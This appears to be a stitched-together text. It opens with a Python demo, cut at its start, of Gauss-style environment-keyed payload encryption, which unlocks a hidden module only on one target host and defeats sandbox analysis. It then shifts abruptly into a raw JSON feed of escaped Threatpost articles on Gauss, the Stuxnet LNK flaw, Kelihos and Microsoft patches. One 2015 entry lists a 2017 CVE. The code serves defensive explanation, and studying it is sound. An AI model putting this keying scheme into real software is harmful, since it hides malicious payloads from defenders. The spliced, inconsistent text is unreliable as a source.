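ITERATIONS = 10_000      # iterated hashing makes each candidate expensive to test


def iterated_md5(data, salt, rounds=ITERATIONS):
    """Fingerprint of `salt + data` after `rounds` chained MD5 applications."""
    digest = salt + data
    for _ in range(rounds):
        digest = hashlib.md5(digest).digest()
    return digest


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); chosen only because it is symmetric and tiny."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def candidates(environment):
    """Strings the victim side can enumerate locally: PATH entry + Program Files name."""
    for path_entry in environment["PATH"].split(";"):
        for name in environment["PROGRAMFILES_ENTRIES"]:
            yield (path_entry + name).encode("utf-16-le")


def find_key(environment, check_salt, check_hash, key_salt):
    """Victim side: the candidate whose salted hash matches yields the key via a second salt."""
    for cand in candidates(environment):
        if iterated_md5(cand, check_salt) == check_hash:
            return iterated_md5(cand, key_salt)
    return None


def decrypt_payload(environment, package):
    """Returns the plaintext module on the right host, None anywhere else."""
    key = find_key(environment, package["check_salt"], package["check_hash"], package["key_salt"])
    if key is None:
        return None
    plain = rc4(key, package["ciphertext"])
    if hashlib.sha256(plain).digest() != package["plain_hash"]:   # reject a wrong key
        return None
    return plain


def build_package(target_string, payload, check_salt, key_salt):
    """Attacker side: bind the payload to one string that exists only on the target."""
    cand = target_string.encode("utf-16-le")
    key = iterated_md5(cand, key_salt)
    return {
        "check_salt": check_salt,
        "check_hash": iterated_md5(cand, check_salt),
        "key_salt": key_salt,
        "ciphertext": rc4(key, payload),
        "plain_hash": hashlib.sha256(payload).digest(),
    }


# Constructed demo values, not real Gauss artefacts.
CHECK_SALT = bytes.fromhex("00112233445566778899aabbccddeeff")
KEY_SALT = bytes.fromhex("ffeeddccbbaa99887766554433221100")
TARGET_STRING = "C:\\Windows\\system32\\" + "ExampleApp"      # PATH entry + folder name
PAYLOAD = b"<demo payload: the real module would sit here>"
PACKAGE = build_package(TARGET_STRING, PAYLOAD, CHECK_SALT, KEY_SALT)

# A host that has the expected Program Files folder unlocks the payload...
TARGET_ENV = {
    "PATH": "C:\\Windows\\system32\\;C:\\Windows\\",
    "PROGRAMFILES_ENTRIES": ["Common Files", "ExampleApp", "Internet Explorer"],
}
# ...an analyst sandbox without it walks every candidate and finds nothing.
ANALYST_ENV = {
    "PATH": "C:\\Windows\\system32\\;C:\\Windows\\",
    "PROGRAMFILES_ENTRIES": ["Common Files", "Internet Explorer", "IDA"],
}

if __name__ == "__main__":
    print(decrypt_payload(TARGET_ENV, PACKAGE))    # the demo payload
    print(decrypt_payload(ANALYST_ENV, PACKAGE))   # None
```

The point for a responder is in the last two lines: the same package yields the module on the targeted host and nothing in a sandbox, so the only offline attack is to guess the candidate space (here, plausible PATH and Program Files strings) and pay the iteration cost for every guess.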
\n\nThis complex routine led researchers to speculate that Gauss may have been designed to infiltrate a specific kind of network.\n\n“It may have been built with an air-gapped network in mind,” said Roel Schouwenberg, a senior malware researcher at Kaspersky Lab, which discovered Gauss and assisted in the investigation into Flame earlier this year.\n\nAn air gap is a physical separation between a machine or network and any other network, often used in military and other sensitive environments to keep machines housing classified data isolated or to prevent attackers from moving from one machine to another.\n\nGauss has a lot of similarities to its malicious predecessors, and researchers are confident that it is the handiwork of the same group that wrote Flame at a minimum, and likely Duqu and Stuxnet as well.\n\n“Based on our analysis and the timestamps from the collected malware modules, we believe the Gauss operation started sometime around August-September 2011. This is particularly interesting because around September 2011, the CrySyS Lab in Hungary announced the discovery of Duqu. We do not know if the people behind Duqu switched to Gauss at that time but we are quite sure they are related: Gauss is related to Flame, Flame is related to Stuxnet, Stuxnet is related to Duqu. Hence, Gauss is related to Duqu,” Kaspersky Lab researchers said in a statement on the new malware.\n\nRight now, the malware’s infrastructure is dormant and researchers said that the command-and-control system for the malware went offline last month. There are five C&C servers that were in use during the time that Gauss was active, and they were separate from the much larger C&C system used by Flame.\n\nNamed after the German mathematician Carl Friedrich Gauss, the new malware, like Flame, Duqu and Stuxnet before it, is somewhat of a mystery at the moment, in a number of respects. 
Researchers are not sure how the malware spreads or infects machines, although it does have the same capability to infect USB sticks and exploits the same LNK vulnerability that both Stuxnet and Flame did. That turned out to be just one of the methods that Stuxnet used to compromise a new machine, and there may well be others yet to be discovered in Gauss, as well. It does not look as though Gauss uses any zero-day vulnerabilities to infect PCs, but researchers are still unsure how the malware initially infects a new machine.\n\n“It’s important to mention that Gauss infects USB sticks with a data stealing component that takes advantage of the same .LNK (CVE-2010-2568) vulnerability exploited by Stuxnet and Flame. At the same time, the process of infecting USB sticks is more intelligent and efficient. Gauss is capable of ‘disinfecting’ the drive under certain circumstances, and uses the removable media to store collected information in a hidden file. The ability to collect information in a hidden file on USB drives exists in Flame as well. Another interesting component of Gauss is the installation of a custom font called Palida Narrow. The purpose of this font installation is currently unknown,” Kaspersky’s researchers said.\n\nThe payload that Gauss delivers is also a mystery. The main payload is encrypted using a key that’s derived from a series of variables taken from the system it’s on, and researchers haven’t been able to decrypt the file at this point. Aside from the data-stealing and banker Trojan functionality that’s already known, there could be other hidden functionality in Gauss that hasn’t yet come to light.\n\n“Gauss is much more multi-faceted I would say than Stuxnet, which had one particular goal,” Schouwenberg said. “This is more about surveillance than espionage. 
We don’t necessarily think they’re trying to steal any money, but maybe just monitor what’s happening in these accounts.”\n\nOne of the other interesting aspects of Gauss’s discovery is its geographic distribution. The vast majority of the infected machines – 1,660 of them – are located in Lebanon. Other Middle Eastern countries, including Israel and Palestine, also show infections, but not nearly as many as Lebanon.\n\nGauss is the latest in what has become an ever-expanding group of attack tools that researchers have classified as cyberweapons, or malware specifically designed by governments or government-sponsored groups to target foreign governments. [Stuxnet](<https://threatpost.com/stuxnet-authors-made-several-basic-errors-011811/>) was the first and most famous of these and was written specifically to compromise the industrial control systems of an Iranian nuclear facility. Next came [Duqu](<https://threatpost.com/anatomy-duqu-attacks-112111/>), a similar tool with a broader target base that researchers said was closely related to Stuxnet and likely produced by the same team. When Flame appeared earlier this year, it signaled a change in the landscape, as researchers found that the malware used a novel spreading technique: a fraudulent Microsoft digital certificate, obtained through an MD5 collision attack, let it impersonate a Windows Update server.\n\nNow comes Gauss, the latest member of the Stuxnet-Duqu-Flame family tree, armed with an encrypted payload and an odd proclivity to steal online banking credentials. That’s aberrant behavior for a tool allegedly designed by a government, but as the payload, and therefore the malware’s ultimate goal, are unknown at this point, the financial component to Gauss may become clear as time goes on.\n\n“They really went to a lot of trouble to make it hard to break the crypto on Gauss. We’re keeping in mind the possibility of a destructive payload for ICS or SCADA systems,” Schouwenberg said. 
\u201cMaybe it\u2019s a side effect of the encrypted payload that no one will be able to copy and paste the code like they could with Stuxnet. Maybe they tried to learn some lessons from Stuxnet.\u201d\n", "modified": "2013-04-17T16:31:44", "published": "2012-08-09T13:31:45", "id": "THREATPOST:FD55FE2A305AB024AFF39336C3AA9731", "href": "https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/76892/", "type": "threatpost", "title": "New Gauss Malware, Descended From Flame and Stuxnet, Found On Thousands of PCs in Middle East", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:23", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "Microsoft\u2019s Security Intelligence Report painted a bleak picture when it comes to malware, fraudulent login attempts and the staying power of really old exploits. Key findings in the 198-page biannual report run the gamut illustrating [how old threats die hard](<http://download.microsoft.com/download/E/8/B/E8B5CEE5-9FF6-4419-B7BF-698D2604E2B2/Microsoft_Security_Intelligence_Report_Volume_20_English.pdf>) and what new threats are on the horizon.\n\nThe report, released Thursday, analyzes the threat landscape of exploits, vulnerabilities, and malware using data for the third and fourth quarters of 2015. Data is culled from its own internet services and more than 600 million computers worldwide running services such as Windows Defender and the Microsoft Malicious Software Removal Tool.\n\nCertainly, there were plenty of bright spots in the report, especially if you lived in North America where, according to Microsoft, we are one of the least likely to become infected compared to other parts of the world. 
Another bright spot: while exploit and malware attacks are on the rise, the number of successful infections is declining.\n\nBut the “too long; didn’t read” takeaway from Microsoft’s SIR is simple. “Threats don’t change as fast as we think they do. Many of the issues we are faced with today are the same as they have been for years,” said Dan Guido, a security expert and founder of Trail of Bits. “Many of the exploits and malware out there only affect older systems, and Microsoft has done a great job at designing Windows 10 and other, current generation, software to avoid them entirely. One of the easiest ways you can remove yourself from harm’s way is to buy a new computer and get rid of an older one.”\n\n**Vulnerabilities**\n\nThe longer version: Microsoft observed a rise in vulnerability disclosures of 9.4 percent in the second half of 2015 compared to the previous six months. Fifty percent of those vulnerabilities were rated medium severity by Microsoft. Disclosures of high-severity vulnerabilities increased 41.7 percent across the industry in the second half of 2015, accounting for 41.8 percent of all vulnerabilities.\n\nMost of those vulnerabilities were in third-party Windows applications, followed by the core operating system, then OS applications and web browsers, according to Microsoft.\n\n**Exploit Kits**\n\nFigure: Quarterly trends for the top 10 malware and unwanted software families detected on domain-joined computers in 2H15, by percentage of computers encountering each family.\n\nAfter decreasing steadily for more than a year, encounters with exploit kits increased by more than a third from the third quarter of 2015 to the fourth, according to Microsoft. 
Exploit kits remained the most commonly encountered type of exploit in the second half of the year, with an encounter rate more than four times that of the next most common type of exploit, according to Microsoft.\n\nThe most prevalent exploit kit was Angler, and the most targeted operating system flaw was CVE-2010-2568, a vulnerability in Windows Shell. CVE-2010-2568, well known for its use by the Stuxnet malware family in June 2010, has had a patch available since Aug. 2, 2010 (MS10-046; that fix was later found to be incomplete and was supplemented in March 2015 by MS15-020 for CVE-2015-0096), but many systems are still being successfully targeted.\n\n“Recently, the industry has seen a rise in attacks exploiting 10-year-old vulnerabilities to gain access and encrypt systems. The question is, why haven’t these old vulnerabilities been fixed yet?” said Gavin Millard, EMEA Technical Director for Tenable Network Security. “It’s critically important that organizations don’t forget to patch the long forgotten vulnerabilities still lingering that can be easily exploited,” he said.\n\n**Malware on the Move**\n\nFigure: Top categories of malware and unwanted software detected by Windows Defender and System Center Endpoint Protection at Microsoft in 2H15\n\nAs for malware, according to Microsoft, the share of PCs worldwide that encountered attempted malware infections in the second half of 2015 climbed to 20 percent, six percentage points higher than a year earlier. Ransomware accounted for less than 0.5 percent of malware that attempted to infect Windows PCs. 
Ransomware, Microsoft reported, is being used by attackers more judiciously, in targeted attacks.\n\nTwo new browser modifiers, Win32/Diplugem and Win32/SupTab, were primarily responsible for the increased encounter rate of malware in the third quarter of 2015.\n\nOne interesting finding: PCs managed by IT are much less likely to encounter malware, with about 11 percent of domain-joined PCs encountering malware in the fourth quarter, compared to about 22 percent of non-domain-joined systems, according to Microsoft.\n\n**Password Attacks**\n\nMicrosoft tapped intelligence from Microsoft Accounts (Outlook.com, OneDrive and Skype) and also its Azure Active Directory (used for Office 365, Box and cloud apps) and measured how often, and how successfully, attackers tried to compromise accounts via phishing, brute force, social engineering, and other types of attacks.\n\n“From all this data gathering and analysis, each day Microsoft’s account protection systems automatically detect and prevent more than 10 million attacks, from tens of thousands of locations, including millions of attacks where the attacker has valid credentials,” according to Microsoft.\n\nMicrosoft reports its accounts see in excess of 13 billion logins per day, of which 10 million attempts are flagged as fraudulent.\n\n**Captain Obvious Recommendations**\n\nMicrosoft’s recommended solutions won’t surprise any seasoned security experts. 
Microsoft recommends:\n\n * Enterprise networks should consider blocking certain types of websites that don\u2019t serve the interest of the business.\n * Prepare your network to be forensically ready, so that you can achieve containment and recovery if a compromise occurs.\n * Make sure that your organization\u2019s internet-facing assets are always running up-to-date applications and security updates, and that they are regularly audited for suspicious files and activity.\n * Conduct enterprise software security awareness training, and build awareness of malware prevention.\n * Institute a strong network firewall and proxy.\n * Apply all security updates as soon as they become available.\n * Consider disabling features, such as EPS or macros, in powerful products like Microsoft Office by using Group Policy.\n * Enterprise networks should segregate high business impact data holding segments from internet-connected networks.\n", "modified": "2016-05-13T16:49:41", "published": "2016-05-07T09:52:06", "id": "THREATPOST:EE3B2C051F98B1FC8B031246AF4EBA62", "href": "https://threatpost.com/old-exploits-die-hard-says-microsoft-report/117918/", "type": "threatpost", "title": "Microsoft Security Intelligence Report: Top Takeaways", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T16:49:57", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "Popular conferencing apps have become a major cybercrime lure during the COVID-19 work-from-home era \u2013 and Skype is the undisputed leader when it comes to being impersonated by malicious downloads, researchers have found.\n\nAn April analysis from Kaspersky uncovered a total of 120,000 suspicious malware and adware packages in the wild masquerading as versions of the video calling app.\n\nIt should be said that Skype isn\u2019t alone in being targeted: The research found that among a total of 1,300 suspicious files not using the Skype 
name, 42 percent were disguised as Zoom, followed by WebEx (22 percent), GoToMeeting (13 percent), Flock (11 percent) and Slack (11 percent).\n\n“With the rise of social distancing, Kaspersky experts investigated the threat landscape for social meeting applications to make sure users are safe and their communication experience is enjoyable,” the firm said in an emailed analysis. “Social meeting applications currently provide easy ways for people to connect via video, audio or text when no other means of communication are available. However, cyber-fraudsters do not hesitate to use this fact and try to distribute various cyberthreats under the guise of popular apps.”\n\nSome of the files found turned out to be simply knockoff versions of the real thing, but among the actual threats detected, a few malware families and file types came to the fore, including two [adware families](<https://threatpost.com/google-play-adware-30-million/144098/>): DealPly and DownloadSponsor.\n\n“Both families are installers that show ads or download adware modules,” according to the analysis. “Such software typically appears on users’ devices once they are downloaded from unofficial marketplaces.”\n\nThere were also some malware threats disguised as .LNK files – shortcuts to applications – that Kaspersky detected as Exploit.Win32.CVE-2010-2568. This is “an old, yet still widespread malicious code that allows attackers to infect the target with additional malware,” according to the firm. The old, patched [vulnerability it uses](<https://nvd.nist.gov/vuln/detail/CVE-2010-2568>) is a flaw in Windows Shell: Windows Explorer does not properly handle shortcut files when rendering their icons, which allows arbitrary code execution via specially crafted .LNK or .PIF shortcut files, without the user ever opening the shortcut. 
It affects Windows XP, Vista and Windows 7, mostly.\n\nTrojans were also a popular malware type found in the fake apps, especially Skype, the firm found.\n\n“In the current landscape, when most of us are working from home, it is extremely important to make sure that what we use as a tool for online social meeting is downloaded from a legitimate source, set up properly and doesn’t have severe unpatched vulnerabilities,” said Denis Parinov, security expert at Kaspersky, via email.\n", "modified": "2020-04-08T16:23:29", "published": "2020-04-08T16:23:29", "id": "THREATPOST:F3563336B135A1D7C1251AE54FDC6286", "href": "https://threatpost.com/skype-apps-hide-malware/154566/", "type": "threatpost", "title": "ThreatList: Skype-Themed Apps Hide a Raft of Malware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:01:46", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2010-2772"], "description": "There’s a little Michael Myers in the Kelihos botnet; maim it, kill it and it keeps on coming back to wreak more havoc. The 2011 [takedown of the Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) was one of Microsoft’s high-profile success stories against spambots and the like, yet Kelihos was back for more at the start of 2012 using dynamic fast-flux techniques to avoid detection and further shutdowns.\n\nAs 2012 winds down, Kelihos is still going strong, now relying on double fast-flux domains to spread spam and malware. According to an analysis from a [researcher at abuse.ch](<http://www.abuse.ch/?p=4878>), Kelihos has also switched top-level domains, moving to .ru from .eu. More insidious, however, is that it now has the ability to spread via removable drives such as USB storage devices.\n\nOnce this latest update of Kelihos infects a computer, it connects with a .ru domain hosting its command and control looking for updates. The .ru domain is double fast-flux hosted, the researcher, who preferred to not be identified, said. Once an updated version of Kelihos is sent to the infected machine, it will infect any removable drives attached to the computer by exploiting the same vulnerability as Stuxnet. 
[CVE-2010-2568 is a Windows Shell vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) that would give an attacker remote access via a malicious .LNK or .PIF shortcut file that is not properly handled by Windows Explorer during icon display. Malware exploiting this vulnerability and [CVE-2010-2772 in Siemens WinCC SCADA systems](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772>) was found in July 2010.\n\nThe switch to .ru domains happened during the summer, according to the report, and the attackers have a lengthy list of sites from which to send new binaries updating the botnet, all of which are registered to REGGI-RU, a registrar in Russia. The botnet operators, however, are using a registrar in the Bahamas to register the name server domains providing DNS resolution to the Russian domains hosting malware, the site said.\n\n\u201cKelihos is not easy to shut down since it is using double FastFlux for its malware distribution domains and relies on P2P techniques for botnet communication. So there is no central botnet infrastructure,\u201d the researcher said. \u201cBy adding the possibility to spread via removable drives, Kelihos also has a very effective way to spread itself across networks and computers even without the need of a central (distribution) infrastructure. Last but not least, the infection binaries associated with Kelihos I\u2019ve seen so far have a very poor AV detection rate.\u201d\n\nKelihos boasts up to 150,000 spambots per day, the same level of activity as the Cutwail botnet, which was recently discovered to be spamming out the [Gameover variant of the Zeus Trojan](<https://threatpost.com/gameover-zeus-variant-sends-malicious-email-cutwail-botnet-120512/>).\n\nKelihos remains a prime example of how difficult it is to permanently disable and shut down a botnet that is this profitable. 
After September\u2019s takedown, in which Microsoft and researchers from Kaspersky Labs sinkholed the botnet\u2019s command and control, [Kelihos was back in business by January](<https://threatpost.com/kelihos-botnet-resurfaces-013112/>). Kaspersky researcher Tillmann Werner said the initial takedown would only be a temporary solution because for legal reasons the security companies could not push an update to the botnet that would disable it. Instead, the peer in the network that was sinkholed was no longer the dominant one, and others eventually began communicating with the compromised machines.\n", "modified": "2013-04-17T16:31:06", "published": "2012-12-11T14:28:33", "id": "THREATPOST:5202B8AD19491EC98E5A6D0691C3F16C", "href": "https://threatpost.com/kelihos-update-includes-new-tld-and-usb-infection-capabilities-121112/77299/", "type": "threatpost", "title": "Kelihos Update Includes New TLD and USB Infection Capabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0096"], "description": "A five-year-old Microsoft patch for the .LNK vulnerability exploited by Stuxnet failed to properly protect Windows machines, leaving them exposed to exploits since 2010.\n\nMicrosoft today is expected to release a security bulletin, MS15-020, patching the vulnerability ([CVE-2015-0096](<https://bugs.launchpad.net/bugs/cve/2015-0096>)). It is unknown whether there have been public exploits of patched machines. The [original LNK patch](<https://technet.microsoft.com/library/security/ms10-046>) was released Aug. 
2, 2010.\n\nThe [.LNK vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) was part of Stuxnet\u2019s arsenal as it went after Iran\u2019s nuclear program with a barrage of exploits targeting Windows vulnerabilities, as well as shortcomings inside Siemens programmable logic controllers in charge of centrifuge operations inside the Natanz uranium enrichment facility.\n\nGerman researcher Michael Heerklotz in January reported the new findings to HP\u2019s Zero Day Initiative, which is expected to release full details today at 5 p.m. Eastern time.\n\n\u201cThat patch didn\u2019t completely address the .LNK issue in the Windows shell, and there were weaknesses left behind that have been resolved in this patch,\u201d said Brian Gorenc, manager of vulnerability research with ZDI. Gorenc said the vulnerability works on Windows machines going back to Windows XP through Windows 8.1, and the proof of concept exploit developed by Heerklotz and tweaked by ZDI evades the validation checks put in place by the original Microsoft security bulletin, CVE-2010-2568.\n\nLNK files define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, ZDI said, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.\n\n\u201cWhat makes this vulnerability so attractive is the history behind its attack surface, and the ability to load arbitrary DLLs to execute code,\u201d Gorenc said. \u201cFrom an attacker\u2019s perspective, if they can get a user to view a folder with a malicious LNK stored inside, they will be able to execute arbitrary code. 
It\u2019s an easy attack surface for them to hit.\u201d\n\nThe exploit code is fairly easy to generate, Gorenc said, and does not require bypassing any of the memory mitigations put in place by Microsoft in its operating system.\n\nGorenc would not say whether the vulnerability had been exploited in the wild, but did point out that a Metasploit module has been available since 2010 and has been used in countless pen-tests.\n\nThe timing of this announcement coincides with new research coming out of last month\u2019s Kaspersky Security Analyst Summit, during which the [Equation APT group](<https://threatpost.com/massive-decades-long-cyberespionage-framework-uncovered/111080>) was uncovered. The group has been linked to Stuxnet, Flame and other advanced attack platforms, and made use of the same .LNK vulnerability.\n\nThe most direct connection was found in the Fanny worm that is part of the Equation malware toolkit and pre-dates Stuxnet. The worm exploits two zero day vulnerabilities later used by Stuxnet, including the [.LNK exploit](<https://threatpost.com/massive-decades-long-cyberespionage-framework-uncovered/111080>). Fanny was used to infect air-gapped machines inside of sensitive installations, moving between infected systems via USB removable storage drives.\n\nWhen a USB stick is infected, the Fanny worm creates a hidden storage partition on the drive. When the infected stick is plugged into an air-gapped machine that is not online, it maps that computer\u2019s system information. If the stick is later plugged into a machine that is connected to the Internet, the stolen data is sent to the attackers. 
The attackers can then save commands to the hidden partition, and if the stick is plugged back into the air-gapped machine, Fanny will recognize the commands and run them.\n\n\u201cThis effectively allowed the Equation group to run commands inside air-gapped networks through the use of infected USB sticks, as well as map the network infrastructure of such networks,\u201d said a report written by Kaspersky Lab.\n", "modified": "2015-03-13T19:53:51", "published": "2015-03-10T13:00:57", "id": "THREATPOST:13BF380EC94838E00D8D4BD43095E77A", "href": "https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558/", "type": "threatpost", "title": "Patched Windows Machines Exposed to Stuxnet LNK Flaw All Along", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2012-0158", "CVE-2014-2423"], "description": "One of the alleged mandates around the development of the Stuxnet worm was that the malware\u2019s numerous components\u2014which included a handful of zero days\u2014should never escape the Natanz uranium enrichment facility in Iran. Eight years later, evidence continues to mount as to how that mandate was categorically not met.\n\nKaspersky Lab today released a [report](<https://securelist.com/analysis/publications/78125/exploits-how-great-is-the-threat/>) on exploits in the wild that indicates that endpoints are still running head-on into exploits for the since-patched [LNK vulnerability](<https://threatpost.com/key-stuxnet-lnk-spreading-mechanism-stops-working-062512/76730/>) ([CVE-2010-2568](<https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>)), almost two times more in 2016 than the next most prevalent exploit in circulation, Lotoor, which roots Android devices. 
In 2016, the Kaspersky report says, exploits for the LNK vulnerability (25 percent) and Lotoor (16 percent) account for 41 percent of exploits encountered by users. While these numbers are down from 2015 (27 percent and 11 percent respectively), the [LNK exploit](<https://securelist.com/blog/events/33206/the-day-the-stuxnet-died-27/>) appears to be hanging around for the foreseeable future.\n\n\u201cThis may be due to the fact that malware that uses these exploits has a self-replicating feature, constantly recreating itself in the attacked network where vulnerable computers are installed,\u201d Kaspersky Lab said in its report.\n\nThe LNK exploit was just part of the Stuxnet attacks on Natanz, which targeted not only Windows machines running in the facility, but primarily Siemens programmable logic controllers managing centrifuges used to enrich uranium to support Iran\u2019s nuclear efforts. Exploits revolved around maliciously crafted .LNK files that were not processed securely as Windows Explorer icons were displayed. Successful exploits allowed the attackers to execute code in the Windows shell on vulnerable machines.\n\nLNK files define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.\n\nWhile Microsoft quickly patched the vulnerability once it was disclosed in 2010, it was reported five years later that [the original patches were incomplete](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558/>), forcing Microsoft to release an update bulletin with new patches.\n\nThe Kaspersky report, meanwhile, demonstrates the value of reliable exploits to attackers. 
Many of the exploits called out in the report are not flashy unpatched zero-days, but instead have some mileage on them. While [exploit kits dropped off](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) the lists of top threats, venerable standbys such as CVE-2012-0158 in Office and CVE-2014-2423 in Java continue to draw the attention of exploit writers.\n\nThe widespread disappearance of exploit kits\u2014largely because of the [arrest of the criminals behind Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>)\u2014has forced criminals to return to email-based attacks with macro-based malware buried inside Office attachments, now a top vehicle for malware delivery.\n\nFor example, attacks against browser and Windows vulnerabilities dropped 33.4 percent and 21.5 percent respectively from 2015 to 2016, Kaspersky said, while Office exploits rose 103 percent. While exploits against Adobe Flash and Android rose last year, Java and Adobe Reader exploits joined browsers and Windows on the negative side.\n\nKaspersky Lab said the number of browser vulnerabilities overall dropped 8 percent last year, while disclosed Office bugs went up 20 percent.\n\nOther noteworthy data points from the report include:\n\n * Kaspersky said it blocked 702 million attacks using an exploit in 2016, up 24 percent from 2015\n * Corporate users encountering attacks using exploits increased 28 percent\n * 70 percent of users encountered browser, Windows, Android or Office exploits\n * Russian-speaking APT Sofacy has used six zero-day exploits and 25 vulnerabilities overall; Equation Group has used eight zero days, and 17 vulnerabilities\n * 15 percent of computers in Europe and North America are still vulnerable to CVE-2012-0158\n", "modified": "2017-04-25T19:46:48", "published": "2017-04-20T12:15:46", "id": "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "href": "https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/", 
"type": "threatpost", "title": "Stuxnet LNK Exploits Still Widely Circulated", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:14", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0072", "CVE-2017-11882"], "description": "Windows IT shops figure to be in for some scrambling today. Not only was it revealed that a five-year-old [patch for a vulnerability exploited by Stuxnet was incomplete](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558>) and machines have been exposed since 2010, but today is also [Patch Tuesday](<https://technet.microsoft.com/library/security/ms15-mar>) and the updated Stuxnet patch is one of 14 bulletins released by Microsoft.\n\nFive of the bulletins are rated critical by Microsoft, and include another Internet Explorer rollup and a patch for the recently disclosed [FREAK attack](<https://threatpost.com/new-freak-attack-threatens-many-ssl-clients/111390>). Microsoft also released an advisory announcing that SHA-2 code signing support has been added to Windows 7 and Windows Server 2008 R2. Later versions of Windows desktop and server OSes already include support for SHA-2 signing and verification, Microsoft said.\n\nThe highest profile bulletin, however, is [MS15-020](<https://technet.microsoft.com/library/security/MS15-020>) which resolves some issues left behind by the original Stuxnet patch, CVE-2010-2568, released in August 2010. The bulletin covers two remote code execution vulnerabilities, one addressing how Windows handles loading of DLL files, and the other patches how Windows Text Services improperly handles objects in memory.\n\nThe DLL planting vulnerability was used by Stuxnet to attack the Iranian nuclear program in 2009. 
If a user viewed a folder or directory storing a malicious .LNK file, the exploit would allow the attacker to run code of their choice remotely.\n\nThe issue was reported to HP\u2019s Zero Day Initiative, which worked with Microsoft providing it with details and a proof of concept exploit that was used to build a new patch.\n\nThe IE bulletin, [MS15-018](<https://technet.microsoft.com/library/security/MS15-018>), addresses a number of memory corruption and elevation of privileges vulnerabilities in the browser.\n\n\u201cThe security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory, by modifying how the VBScript scripting engine handles objects in memory, by helping to ensure that cross-domain policies are properly enforced in Internet Explorer, and by adding additional permission validations to Internet Explorer,\u201d Microsoft said in its advisory.\n\nThe vulnerability is rated critical for all client versions of IE going back to IE6, while it\u2019s rated moderate going back to IE6 on Windows Server.\n\nMicrosoft said that one of the elevation of privilege vulnerabilities has been publicly disclosed and exploited. Some details on CVE-2015-0072 were disclosed in early February by U.K. researcher David Leo of Deusen. The vulnerability, a [universal cross-site scripting (XSS) bug](<https://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>), could be exploited to steal information or inject code into domains on the browser on Windows 7 and 8.1, he said.\n\nMicrosoft also patched a critical vulnerability in the Windows VBScript scripting engine that could lead to remote code execution. [MS15-019](<https://technet.microsoft.com/library/security/MS15-019>) patches the flaw, which can be exploited if a user is led to a website hosting an exploit. 
VBScript 5.8 in IE 8-11 is affected by the vulnerability, which exists in the way the VBScript engine, when rendered in IE, handles objects in memory.\n\nMicrosoft also patched critical remote code execution vulnerabilities in Office. The critical bugs in [MS15-022](<https://technet.microsoft.com/library/security/MS15-022>) lead to remote code execution and can be exploited via malicious Office documents. In addition to Office software, Sharepoint is also affected with a pair of cross-site scripting vulnerabilities.\n\nThe final critical bulletin, MS15-021, patches eight vulnerabilities in the Adobe Font Driver, four of them critical remote code execution bugs, along with less-severe information disclosure and denial of service vulnerabilities.\n\nThe critical RCE vulnerabilities are exploited over the web by taking advantage of a flaw in the way the driver improperly overwrites objects in memory. None of the vulnerabilities were publicly disclosed, nor have they been exploited in the wild.\n\nMicrosoft also released a bulletin addressing the [FREAK vulnerabilities](<https://threatpost.com/new-freak-attack-threatens-many-ssl-clients/111390>). [MS15-031](<https://technet.microsoft.com/library/security/MS15-031>) specifically patches the [security feature bypass vulnerability in Schannel](<https://threatpost.com/microsoft-warns-schannel-vulnerable-to-freak-attacks/111474>), the Windows implementation of SSL/TLS, that enables FREAK attacks. 